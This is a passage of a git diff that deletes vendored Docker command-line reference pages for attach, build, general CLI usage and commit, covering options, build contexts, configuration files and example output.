-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# attach
-
-```markdown
-Usage: docker attach [OPTIONS] CONTAINER
-
-Attach to a running container
-
-Options:
-      --detach-keys string   Override the key sequence for detaching a container
-      --help                 Print usage
-      --no-stdin             Do not attach STDIN
-      --sig-proxy            Proxy all received signals to the process (default true)
-```
-
-Use `docker attach` to attach to a running container using the container's ID
-or name, either to view its ongoing output or to control it interactively.
-You can attach to the same contained process multiple times simultaneously,
-screen sharing style, or quickly view the progress of your detached process.
-
-To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the
-container. If `--sig-proxy` is true (the default),`CTRL-c` sends a `SIGINT` to
-the container. You can detach from a container and leave it running using the
- `CTRL-p CTRL-q` key sequence.
-
-> **Note:**
-> A process running as PID 1 inside a container is treated specially by
-> Linux: it ignores any signal with the default action. So, the process
-> will not terminate on `SIGINT` or `SIGTERM` unless it is coded to do
-> so.
-
-It is forbidden to redirect the standard input of a `docker attach` command
-while attaching to a tty-enabled container (i.e.: launched with `-t`).
-
-While a client is connected to container's stdio using `docker attach`, Docker
-uses a ~1MB memory buffer to maximize the throughput of the application. If
-this buffer is filled, the speed of the API connection will start to have an
-effect on the process output writing speed. This is similar to other
-applications like SSH. Because of this, it is not recommended to run
-performance critical applications that generate a lot of output in the
-foreground over a slow client connection. Instead, users should use the
-`docker logs` command to get access to the logs.
-
-
-## Override the detach sequence
-
-If you want, you can configure an override the Docker key sequence for detach.
-This is useful if the Docker default sequence conflicts with key sequence you
-use for other applications. There are two ways to define your own detach key
-sequence, as a per-container override or as a configuration property on  your
-entire configuration.
-
-To override the sequence for an individual container, use the
-`--detach-keys="<sequence>"` flag with the `docker attach` command. The format of
-the `<sequence>` is either a letter [a-Z], or the `ctrl-` combined with any of
-the following:
-
-* `a-z` (a single lowercase alpha character )
-* `@` (at sign)
-* `[` (left bracket)
-* `\\` (two backward slashes)
-*  `_` (underscore)
-* `^` (caret)
-
-These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key
-sequences. To configure a different configuration default key sequence for all
-containers, see [**Configuration file** section](cli.md#configuration-files).
-
-#### Examples
-
-    $ docker run -d --name topdemo ubuntu /usr/bin/top -b
-    $ docker attach topdemo
-    top - 02:05:52 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
-    Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
-    Cpu(s):  0.1%us,  0.2%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
-    Mem:    373572k total,   355560k used,    18012k free,    27872k buffers
-    Swap:   786428k total,        0k used,   786428k free,   221740k cached
-
-    PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
-     1 root      20   0 17200 1116  912 R    0  0.3   0:00.03 top
-
-     top - 02:05:55 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
-     Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
-     Cpu(s):  0.0%us,  0.2%sy,  0.0%ni, 99.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
-     Mem:    373572k total,   355244k used,    18328k free,    27872k buffers
-     Swap:   786428k total,        0k used,   786428k free,   221776k cached
-
-       PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
-           1 root      20   0 17208 1144  932 R    0  0.3   0:00.03 top
-
-
-     top - 02:05:58 up  3:06,  0 users,  load average: 0.01, 0.02, 0.05
-     Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
-     Cpu(s):  0.2%us,  0.3%sy,  0.0%ni, 99.5%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
-     Mem:    373572k total,   355780k used,    17792k free,    27880k buffers
-     Swap:   786428k total,        0k used,   786428k free,   221776k cached
-
-     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
-          1 root      20   0 17208 1144  932 R    0  0.3   0:00.03 top
-    ^C$
-    $ echo $?
-    0
-    $ docker ps -a | grep topdemo
-    7998ac8581f9        ubuntu:14.04        "/usr/bin/top -b"   38 seconds ago      Exited (0) 21 seconds ago                          topdemo
-
-And in this second example, you can see the exit code returned by the `bash`
-process is returned by the `docker attach` command to its caller too:
-
-    $ docker run --name test -d -it debian
-    275c44472aebd77c926d4527885bb09f2f6db21d878c75f0a1c212c03d3bcfab
-    $ docker attach test
-    root@f38c87f2a42d:/# exit 13
-    exit
-    $ echo $?
-    13
-    $ docker ps -a | grep test
-    275c44472aeb        debian:7            "/bin/bash"         26 seconds ago      Exited (13) 17 seconds ago                         test
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/build.md b/vendor/github.com/docker/docker/docs/reference/commandline/build.md
deleted file mode 100644
index 42c3ecf65f..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/build.md
+++ /dev/null
@@ -1,451 +0,0 @@
----
-title: "build"
-description: "The build command description and usage"
-keywords: "build, docker, image"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# build
-
-```markdown
-Usage:  docker build [OPTIONS] PATH | URL | -
-
-Build an image from a Dockerfile
-
-Options:
-      --build-arg value         Set build-time variables (default [])
-      --cache-from value        Images to consider as cache sources (default [])
-      --cgroup-parent string    Optional parent cgroup for the container
-      --compress                Compress the build context using gzip
-      --cpu-period int          Limit the CPU CFS (Completely Fair Scheduler) period
-      --cpu-quota int           Limit the CPU CFS (Completely Fair Scheduler) quota
-  -c, --cpu-shares int          CPU shares (relative weight)
-      --cpuset-cpus string      CPUs in which to allow execution (0-3, 0,1)
-      --cpuset-mems string      MEMs in which to allow execution (0-3, 0,1)
-      --disable-content-trust   Skip image verification (default true)
-  -f, --file string             Name of the Dockerfile (Default is 'PATH/Dockerfile')
-      --force-rm                Always remove intermediate containers
-      --help                    Print usage
-      --isolation string        Container isolation technology
-      --label value             Set metadata for an image (default [])
-  -m, --memory string           Memory limit
-      --memory-swap string      Swap limit equal to memory plus swap: '-1' to enable unlimited swap
-      --network string          Set the networking mode for the RUN instructions during build
-                                'bridge': use default Docker bridge
-                                'none': no networking
-                                'container:<name|id>': reuse another container's network stack
-                                'host': use the Docker host network stack
-                                '<network-name>|<network-id>': connect to a user-defined network
-      --no-cache                Do not use cache when building the image
-      --pull                    Always attempt to pull a newer version of the image
-  -q, --quiet                   Suppress the build output and print image ID on success
-      --rm                      Remove intermediate containers after a successful build (default true)
-      --security-opt value      Security Options (default [])
-      --shm-size string         Size of /dev/shm, default value is 64MB.
-                                The format is `<number><unit>`. `number` must be greater than `0`.
-                                Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes),
-                                or `g` (gigabytes). If you omit the unit, the system uses bytes.
-      --squash                  Squash newly built layers into a single new layer (**Experimental Only**)
-  -t, --tag value               Name and optionally a tag in the 'name:tag' format (default [])
-      --ulimit value            Ulimit options (default [])
-```
-
-Builds Docker images from a Dockerfile and a "context". A build's context is
-the files located in the specified `PATH` or `URL`. The build process can refer
-to any of the files in the context. For example, your build can use an
-[*ADD*](../builder.md#add) instruction to reference a file in the
-context.
-
-The `URL` parameter can refer to three kinds of resources: Git repositories,
-pre-packaged tarball contexts and plain text files.
-
-### Git repositories
-
-When the `URL` parameter points to the location of a Git repository, the
-repository acts as the build context. The system recursively clones the
-repository and its submodules using a `git clone --depth 1 --recursive`
-command. This command runs in a temporary directory on your local host. After
-the command succeeds, the directory is sent to the Docker daemon as the
-context. Local clones give you the ability to access private repositories using
-local user credentials, VPN's, and so forth.
-
-Git URLs accept context configuration in their fragment section, separated by a
-colon `:`.  The first part represents the reference that Git will check out,
-this can be either a branch, a tag, or a commit SHA. The second part represents
-a subdirectory inside the repository that will be used as a build context.
-
-For example, run this command to use a directory called `docker` in the branch
-`container`:
-
-```bash
-$ docker build https://github.com/docker/rootfs.git#container:docker
-```
-
-The following table represents all the valid suffixes with their build
-contexts:
-
-Build Syntax Suffix             | Commit Used           | Build Context Used
---------------------------------|-----------------------|-------------------
-`myrepo.git`                    | `refs/heads/master`   | `/`
-`myrepo.git#mytag`              | `refs/tags/mytag`     | `/`
-`myrepo.git#mybranch`           | `refs/heads/mybranch` | `/`
-`myrepo.git#abcdef`             | `sha1 = abcdef`       | `/`
-`myrepo.git#:myfolder`          | `refs/heads/master`   | `/myfolder`
-`myrepo.git#master:myfolder`    | `refs/heads/master`   | `/myfolder`
-`myrepo.git#mytag:myfolder`     | `refs/tags/mytag`     | `/myfolder`
-`myrepo.git#mybranch:myfolder`  | `refs/heads/mybranch` | `/myfolder`
-`myrepo.git#abcdef:myfolder`    | `sha1 = abcdef`       | `/myfolder`
-
-
-### Tarball contexts
-
-If you pass an URL to a remote tarball, the URL itself is sent to the daemon:
-
-Instead of specifying a context, you can pass a single Dockerfile in the `URL`
-or pipe the file in via `STDIN`. To pipe a Dockerfile from `STDIN`:
-
-```bash
-$ docker build http://server/context.tar.gz
-```
-
-The download operation will be performed on the host the Docker daemon is
-running on, which is not necessarily the same host from which the build command
-is being issued. The Docker daemon will fetch `context.tar.gz` and use it as the
-build context. Tarball contexts must be tar archives conforming to the standard
-`tar` UNIX format and can be compressed with any one of the 'xz', 'bzip2',
-'gzip' or 'identity' (no compression) formats.
-
-### Text files
-
-Instead of specifying a context, you can pass a single `Dockerfile` in the
-`URL` or pipe the file in via `STDIN`. To pipe a `Dockerfile` from `STDIN`:
-
-```bash
-$ docker build - < Dockerfile
-```
-
-With Powershell on Windows, you can run:
-
-```powershell
-Get-Content Dockerfile | docker build -
-```
-
-If you use `STDIN` or specify a `URL` pointing to a plain text file, the system
-places the contents into a file called `Dockerfile`, and any `-f`, `--file`
-option is ignored. In this scenario, there is no context.
-
-By default the `docker build` command will look for a `Dockerfile` at the root
-of the build context. The `-f`, `--file`, option lets you specify the path to
-an alternative file to use instead. This is useful in cases where the same set
-of files are used for multiple builds. The path must be to a file within the
-build context. If a relative path is specified then it is interpreted as
-relative to the root of the context.
-
-In most cases, it's best to put each Dockerfile in an empty directory. Then,
-add to that directory only the files needed for building the Dockerfile. To
-increase the build's performance, you can exclude files and directories by
-adding a `.dockerignore` file to that directory as well. For information on
-creating one, see the [.dockerignore file](../builder.md#dockerignore-file).
-
-If the Docker client loses connection to the daemon, the build is canceled.
-This happens if you interrupt the Docker client with `CTRL-c` or if the Docker
-client is killed for any reason. If the build initiated a pull which is still
-running at the time the build is cancelled, the pull is cancelled as well.
-
-## Return code
-
-On a successful build, a return code of success `0` will be returned.  When the
-build fails, a non-zero failure code will be returned.
-
-There should be informational output of the reason for failure output to
-`STDERR`:
-
-```bash
-$ docker build -t fail .
-
-Sending build context to Docker daemon 2.048 kB
-Sending build context to Docker daemon
-Step 1/3 : FROM busybox
- ---> 4986bf8c1536
-Step 2/3 : RUN exit 13
- ---> Running in e26670ec7a0a
-INFO[0000] The command [/bin/sh -c exit 13] returned a non-zero code: 13
-$ echo $?
-1
-```
-
-See also:
-
-[*Dockerfile Reference*](../builder.md).
-
-## Examples
-
-### Build with PATH
-
-```bash
-$ docker build .
-
-Uploading context 10240 bytes
-Step 1/3 : FROM busybox
-Pulling repository busybox
- ---> e9aa60c60128MB/2.284 MB (100%) endpoint: https://cdn-registry-1.docker.io/v1/
-Step 2/3 : RUN ls -lh /
- ---> Running in 9c9e81692ae9
-total 24
-drwxr-xr-x    2 root     root        4.0K Mar 12  2013 bin
-drwxr-xr-x    5 root     root        4.0K Oct 19 00:19 dev
-drwxr-xr-x    2 root     root        4.0K Oct 19 00:19 etc
-drwxr-xr-x    2 root     root        4.0K Nov 15 23:34 lib
-lrwxrwxrwx    1 root     root           3 Mar 12  2013 lib64 -> lib
-dr-xr-xr-x  116 root     root           0 Nov 15 23:34 proc
-lrwxrwxrwx    1 root     root           3 Mar 12  2013 sbin -> bin
-dr-xr-xr-x   13 root     root           0 Nov 15 23:34 sys
-drwxr-xr-x    2 root     root        4.0K Mar 12  2013 tmp
-drwxr-xr-x    2 root     root        4.0K Nov 15 23:34 usr
- ---> b35f4035db3f
-Step 3/3 : CMD echo Hello world
- ---> Running in 02071fceb21b
- ---> f52f38b7823e
-Successfully built f52f38b7823e
-Removing intermediate container 9c9e81692ae9
-Removing intermediate container 02071fceb21b
-```
-
-This example specifies that the `PATH` is `.`, and so all the files in the
-local directory get `tar`d and sent to the Docker daemon. The `PATH` specifies
-where to find the files for the "context" of the build on the Docker daemon.
-Remember that the daemon could be running on a remote machine and that no
-parsing of the Dockerfile happens at the client side (where you're running
-`docker build`). That means that *all* the files at `PATH` get sent, not just
-the ones listed to [*ADD*](../builder.md#add) in the Dockerfile.
-
-The transfer of context from the local machine to the Docker daemon is what the
-`docker` client means when you see the "Sending build context" message.
-
-If you wish to keep the intermediate containers after the build is complete,
-you must use `--rm=false`. This does not affect the build cache.
-
-### Build with URL
-
-```bash
-$ docker build github.com/creack/docker-firefox
-```
-
-This will clone the GitHub repository and use the cloned repository as context.
-The Dockerfile at the root of the repository is used as Dockerfile. You can
-specify an arbitrary Git repository by using the `git://` or `git@` scheme.
-
-```bash
-$ docker build -f ctx/Dockerfile http://server/ctx.tar.gz
-
-Downloading context: http://server/ctx.tar.gz [===================>]    240 B/240 B
-Step 1/3 : FROM busybox
- ---> 8c2e06607696
-Step 2/3 : ADD ctx/container.cfg /
- ---> e7829950cee3
-Removing intermediate container b35224abf821
-Step 3/3 : CMD /bin/ls
- ---> Running in fbc63d321d73
- ---> 3286931702ad
-Removing intermediate container fbc63d321d73
-Successfully built 377c409b35e4
-```
-
-This sends the URL `http://server/ctx.tar.gz` to the Docker daemon, which
-downloads and extracts the referenced tarball. The `-f ctx/Dockerfile`
-parameter specifies a path inside `ctx.tar.gz` to the `Dockerfile` that is used
-to build the image. Any `ADD` commands in that `Dockerfile` that refer to local
-paths must be relative to the root of the contents inside `ctx.tar.gz`. In the
-example above, the tarball contains a directory `ctx/`, so the `ADD
-ctx/container.cfg /` operation works as expected.
-
-### Build with -
-
-```bash
-$ docker build - < Dockerfile
-```
-
-This will read a Dockerfile from `STDIN` without context. Due to the lack of a
-context, no contents of any local directory will be sent to the Docker daemon.
-Since there is no context, a Dockerfile `ADD` only works if it refers to a
-remote URL.
-
-```bash
-$ docker build - < context.tar.gz
-```
-
-This will build an image for a compressed context read from `STDIN`.  Supported
-formats are: bzip2, gzip and xz.
-
-### Usage of .dockerignore
-
-```bash
-$ docker build .
-
-Uploading context 18.829 MB
-Uploading context
-Step 1/2 : FROM busybox
- ---> 769b9341d937
-Step 2/2 : CMD echo Hello world
- ---> Using cache
- ---> 99cc1ad10469
-Successfully built 99cc1ad10469
-$ echo ".git" > .dockerignore
-$ docker build .
-Uploading context  6.76 MB
-Uploading context
-Step 1/2 : FROM busybox
- ---> 769b9341d937
-Step 2/2 : CMD echo Hello world
- ---> Using cache
- ---> 99cc1ad10469
-Successfully built 99cc1ad10469
-```
-
-This example shows the use of the `.dockerignore` file to exclude the `.git`
-directory from the context. Its effect can be seen in the changed size of the
-uploaded context. The builder reference contains detailed information on
-[creating a .dockerignore file](../builder.md#dockerignore-file)
-
-### Tag image (-t)
-
-```bash
-$ docker build -t vieux/apache:2.0 .
-```
-
-This will build like the previous example, but it will then tag the resulting
-image. The repository name will be `vieux/apache` and the tag will be `2.0`.
-[Read more about valid tags](tag.md).
-
-You can apply multiple tags to an image. For example, you can apply the `latest`
-tag to a newly built image and add another tag that references a specific
-version.
-For example, to tag an image both as `whenry/fedora-jboss:latest` and
-`whenry/fedora-jboss:v2.1`, use the following:
-
-```bash
-$ docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 .
-```
-### Specify Dockerfile (-f)
-
-```bash
-$ docker build -f Dockerfile.debug .
-```
-
-This will use a file called `Dockerfile.debug` for the build instructions
-instead of `Dockerfile`.
-
-```bash
-$ docker build -f dockerfiles/Dockerfile.debug -t myapp_debug .
-$ docker build -f dockerfiles/Dockerfile.prod  -t myapp_prod .
-```
-
-The above commands will build the current build context (as specified by the
-`.`) twice, once using a debug version of a `Dockerfile` and once using a
-production version.
-
-```bash
-$ cd /home/me/myapp/some/dir/really/deep
-$ docker build -f /home/me/myapp/dockerfiles/debug /home/me/myapp
-$ docker build -f ../../../../dockerfiles/debug /home/me/myapp
-```
-
-These two `docker build` commands do the exact same thing. They both use the
-contents of the `debug` file instead of looking for a `Dockerfile` and will use
-`/home/me/myapp` as the root of the build context. Note that `debug` is in the
-directory structure of the build context, regardless of how you refer to it on
-the command line.
-
-> **Note:**
-> `docker build` will return a `no such file or directory` error if the
-> file or directory does not exist in the uploaded context. This may
-> happen if there is no context, or if you specify a file that is
-> elsewhere on the Host system. The context is limited to the current
-> directory (and its children) for security reasons, and to ensure
-> repeatable builds on remote Docker hosts. This is also the reason why
-> `ADD ../file` will not work.
-
-### Optional parent cgroup (--cgroup-parent)
-
-When `docker build` is run with the `--cgroup-parent` option the containers
-used in the build will be run with the [corresponding `docker run`
-flag](../run.md#specifying-custom-cgroups).
-
-### Set ulimits in container (--ulimit)
-
-Using the `--ulimit` option with `docker build` will cause each build step's
-container to be started using those [`--ulimit`
-flag values](./run.md#set-ulimits-in-container-ulimit).
-
-### Set build-time variables (--build-arg)
-
-You can use `ENV` instructions in a Dockerfile to define variable
-values. These values persist in the built image. However, often
-persistence is not what you want. Users want to specify variables differently
-depending on which host they build an image on.
-
-A good example is `http_proxy` or source versions for pulling intermediate
-files. The `ARG` instruction lets Dockerfile authors define values that users
-can set at build-time using the  `--build-arg` flag:
-
-```bash
-$ docker build --build-arg HTTP_PROXY=http://10.20.30.2:1234 .
-```
-
-This flag allows you to pass the build-time variables that are
-accessed like regular environment variables in the `RUN` instruction of the
-Dockerfile. Also, these values don't persist in the intermediate or final images
-like `ENV` values do.
-
-Using this flag will not alter the output you see when the `ARG` lines from the
-Dockerfile are echoed during the build process.
-
-For detailed information on using `ARG` and `ENV` instructions, see the
-[Dockerfile reference](../builder.md).
-
-### Optional security options (--security-opt)
-
-This flag is only supported on a daemon running on Windows, and only supports
-the `credentialspec` option. The `credentialspec` must be in the format
-`file://spec.txt` or `registry://keyname`.
-
-### Specify isolation technology for container (--isolation)
-
-This option is useful in situations where you are running Docker containers on
-Windows. The `--isolation=<value>` option sets a container's isolation
-technology. On Linux, the only supported is the `default` option which uses
-Linux namespaces. On Microsoft Windows, you can specify these values:
-
-
-| Value     | Description                                                                                                                                                   |
-|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.  |
-| `process` | Namespace isolation only.                                                                                                                                     |
-| `hyperv`  | Hyper-V hypervisor partition-based isolation.                                                                                                                 |
-
-Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
-
-
-### Squash an image's layers (--squash) **Experimental Only**
-
-Once the image is built, squash the new layers into a new image with a single
-new layer. Squashing does not destroy any existing image, rather it creates a new
-image with the content of the squshed layers. This effectively makes it look
-like all `Dockerfile` commands were created with a single layer. The build
-cache is preserved with this method.
-
-**Note**: using this option means the new image will not be able to take
-advantage of layer sharing with other images and may use significantly more
-space.
-
-**Note**: using this option you may see significantly more space used due to
-storing two copies of the image, one for the build cache with all the cache
-layers in tact, and one for the squashed version.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md
deleted file mode 100644
index e56fb9f847..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md
+++ /dev/null
@@ -1,249 +0,0 @@
----
-title: "Use the Docker command line"
-description: "Docker's CLI command description and usage"
-keywords: "Docker, Docker documentation, CLI, command line"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Use the Docker command line
-
-To list available commands, either run `docker` with no parameters
-or execute `docker help`:
-
-```bash
-$ docker
-Usage: docker [OPTIONS] COMMAND [ARG...]
-       docker [ --help | -v | --version ]
-
-A self-sufficient runtime for containers.
-
-Options:
-      --config string      Location of client config files (default "/root/.docker")
-  -D, --debug              Enable debug mode
-      --help               Print usage
-  -H, --host value         Daemon socket(s) to connect to (default [])
-  -l, --log-level string   Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info")
-      --tls                Use TLS; implied by --tlsverify
-      --tlscacert string   Trust certs signed only by this CA (default "/root/.docker/ca.pem")
-      --tlscert string     Path to TLS certificate file (default "/root/.docker/cert.pem")
-      --tlskey string      Path to TLS key file (default "/root/.docker/key.pem")
-      --tlsverify          Use TLS and verify the remote
-  -v, --version            Print version information and quit
-
-Commands:
-    attach    Attach to a running container
-    # […]
-```
-
-Depending on your Docker system configuration, you may be required to preface
-each `docker` command with `sudo`. To avoid having to use `sudo` with the
-`docker` command, your system administrator can create a Unix group called
-`docker` and add users to it.
-
-For more information about installing Docker or `sudo` configuration, refer to
-the [installation](https://docs.docker.com/engine/installation/) instructions for your operating system.
-
-## Environment variables
-
-For easy reference, the following list of environment variables are supported
-by the `docker` command line:
-
-* `DOCKER_API_VERSION` The API version to use (e.g. `1.19`)
-* `DOCKER_CONFIG` The location of your client configuration files.
-* `DOCKER_CERT_PATH` The location of your authentication keys.
-* `DOCKER_DRIVER` The graph driver to use.
-* `DOCKER_HOST` Daemon socket to connect to.
-* `DOCKER_NOWARN_KERNEL_VERSION` Prevent warnings that your Linux kernel is
-  unsuitable for Docker.
-* `DOCKER_RAMDISK` If set this will disable 'pivot_root'.
-* `DOCKER_TLS_VERIFY` When set Docker uses TLS and verifies the remote.
-* `DOCKER_CONTENT_TRUST` When set Docker uses notary to sign and verify images.
-  Equates to `--disable-content-trust=false` for build, create, pull, push, run.
-* `DOCKER_CONTENT_TRUST_SERVER` The URL of the Notary server to use. This defaults
-  to the same URL as the registry.
-* `DOCKER_HIDE_LEGACY_COMMANDS` When set, Docker hides "legacy" top-level commands (such as `docker rm`, and 
-  `docker pull`) in `docker help` output, and only `Management commands` per object-type (e.g., `docker container`) are
-  printed. This may become the default in a future release, at which point this environment-variable is removed.
-* `DOCKER_TMPDIR` Location for temporary Docker files.
-
-Because Docker is developed using Go, you can also use any environment
-variables used by the Go runtime. In particular, you may find these useful:
-
-* `HTTP_PROXY`
-* `HTTPS_PROXY`
-* `NO_PROXY`
-
-These Go environment variables are case-insensitive. See the
-[Go specification](http://golang.org/pkg/net/http/) for details on these
-variables.
-
-## Configuration files
-
-By default, the Docker command line stores its configuration files in a
-directory called `.docker` within your `$HOME` directory. However, you can
-specify a different location via the `DOCKER_CONFIG` environment variable
-or the `--config` command line option. If both are specified, then the
-`--config` option overrides the `DOCKER_CONFIG` environment variable.
-For example:
-
-    docker --config ~/testconfigs/ ps
-
-Instructs Docker to use the configuration files in your `~/testconfigs/`
-directory when running the `ps` command.
-
-Docker manages most of the files in the configuration directory
-and you should not modify them. However, you *can modify* the
-`config.json` file to control certain aspects of how the `docker`
-command behaves.
-
-Currently, you can modify the `docker` command behavior using environment
-variables or command-line options. You can also use options within
-`config.json` to modify some of the same behavior. When using these
-mechanisms, you must keep in mind the order of precedence among them. Command
-line options override environment variables and environment variables override
-properties you specify in a `config.json` file.
-
-The `config.json` file stores a JSON encoding of several properties:
-
-The property `HttpHeaders` specifies a set of headers to include in all messages
-sent from the Docker client to the daemon. Docker does not try to interpret or
-understand these header; it simply puts them into the messages. Docker does
-not allow these headers to change any headers it sets for itself.
-
-The property `psFormat` specifies the default format for `docker ps` output.
-When the `--format` flag is not provided with the `docker ps` command,
-Docker's client uses this property. If this property is not set, the client
-falls back to the default table format. For a list of supported formatting
-directives, see the
-[**Formatting** section in the `docker ps` documentation](ps.md)
-
-The property `imagesFormat` specifies the default format for `docker images` output.
-When the `--format` flag is not provided with the `docker images` command,
-Docker's client uses this property. If this property is not set, the client
-falls back to the default table format. For a list of supported formatting
-directives, see the [**Formatting** section in the `docker images` documentation](images.md)
-
-The property `serviceInspectFormat` specifies the default format for `docker
-service inspect` output. When the `--format` flag is not provided with the
-`docker service inspect` command, Docker's client uses this property. If this
-property is not set, the client falls back to the default json format. For a
-list of supported formatting directives, see the
-[**Formatting** section in the `docker service inspect` documentation](service_inspect.md)
-
-The property `statsFormat` specifies the default format for `docker
-stats` output. When the `--format` flag is not provided with the
-`docker stats` command, Docker's client uses this property. If this
-property is not set, the client falls back to the default table
-format. For a list of supported formatting directives, see
-[**Formatting** section in the `docker stats` documentation](stats.md)
-
-Once attached to a container, users detach from it and leave it running using
-the using `CTRL-p CTRL-q` key sequence. This detach key sequence is customizable
-using the `detachKeys` property. Specify a `<sequence>` value for the
-property. The format of the `<sequence>` is a comma-separated list of either
-a letter [a-Z], or the `ctrl-` combined with any of the following:
-
-* `a-z` (a single lowercase alpha character )
-* `@` (at sign)
-* `[` (left bracket)
-* `\\` (two backward slashes)
-*  `_` (underscore)
-* `^` (caret)
-
-Your customization applies to all containers started in with your Docker client.
-Users can override your custom or the default key sequence on a per-container
-basis. To do this, the user specifies the `--detach-keys` flag with the `docker
-attach`, `docker exec`, `docker run` or `docker start` command.
-
-Following is a sample `config.json` file:
-
-    {% raw %}
-    {
-      "HttpHeaders": {
-        "MyHeader": "MyValue"
-      },
-      "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}",
-      "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}",
-      "statsFormat": "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}",
-      "serviceInspectFormat": "pretty",
-      "detachKeys": "ctrl-e,e"
-    }
-    {% endraw %}
-
-### Notary
-
-If using your own notary server and a self-signed certificate or an internal
-Certificate Authority, you need to place the certificate at
-`tls/<registry_url>/ca.crt` in your docker config directory.
-
-Alternatively you can trust the certificate globally by adding it to your system's
-list of root Certificate Authorities.
-
-## Help
-
-To list the help on any command just execute the command, followed by the
-`--help` option.
-
-    $ docker run --help
-
-    Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
-
-    Run a command in a new container
-
-    Options:
-          --add-host value             Add a custom host-to-IP mapping (host:ip) (default [])
-      -a, --attach value               Attach to STDIN, STDOUT or STDERR (default [])
-    ...
-
-## Option types
-
-Single character command line options can be combined, so rather than
-typing `docker run -i -t --name test busybox sh`,
-you can write `docker run -it --name test busybox sh`.
-
-### Boolean
-
-Boolean options take the form `-d=false`. The value you see in the help text is
-the default value which is set if you do **not** specify that flag. If you
-specify a Boolean flag without a value, this will set the flag to `true`,
-irrespective of the default value.
-
-For example, running `docker run -d` will set the value to `true`, so your
-container **will** run in "detached" mode, in the background.
-
-Options which default to `true` (e.g., `docker build --rm=true`) can only be
-set to the non-default value by explicitly setting them to `false`:
-
-    $ docker build --rm=false .
-
-### Multi
-
-You can specify options like `-a=[]` multiple times in a single command line,
-for example in these commands:
-
-    $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash
-    $ docker run -a stdin -a stdout -a stderr ubuntu /bin/ls
-
-Sometimes, multiple options can call for a more complex value string as for
-`-v`:
-
-    $ docker run -v /host:/container example/mysql
-
-> **Note:**
-> Do not use the `-t` and `-a stderr` options together due to
-> limitations in the `pty` implementation. All `stderr` in `pty` mode
-> simply goes to `stdout`.
-
-### Strings and Integers
-
-Options like `--name=""` expect a string, and they
-can only be specified once. Options like `-c=0`
-expect an integer, and they can only be specified once.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md
deleted file mode 100644
index 8f971a5d95..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md
+++ /dev/null
@@ -1,93 +0,0 @@
----
-title: "commit"
-description: "The commit command description and usage"
-keywords: "commit, file, changes"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# commit
-
-```markdown
-Usage:  docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]
-
-Create a new image from a container's changes
-
-Options:
-  -a, --author string    Author (e.g., "John Hannibal Smith <hannibal@a-team.com>")
-  -c, --change value     Apply Dockerfile instruction to the created image (default [])
-      --help             Print usage
-  -m, --message string   Commit message
-  -p, --pause            Pause container during commit (default true)
-```
-
-It can be useful to commit a container's file changes or settings into a new
-image. This allows you debug a container by running an interactive shell, or to
-export a working dataset to another server. Generally, it is better to use
-Dockerfiles to manage your images in a documented and maintainable way.
-[Read more about valid image names and tags](tag.md).
-
-The commit operation will not include any data contained in
-volumes mounted inside the container.
-
-By default, the container being committed and its processes will be paused
-while the image is committed. This reduces the likelihood of encountering data
-corruption during the process of creating the commit.  If this behavior is
-undesired, set the `--pause` option to false.
-
-The `--change` option will apply `Dockerfile` instructions to the image that is
-created.  Supported `Dockerfile` instructions:
-`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
-
-## Commit a container
-
-    $ docker ps
-    ID                  IMAGE               COMMAND             CREATED             STATUS              PORTS
-    c3f279d17e0a        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
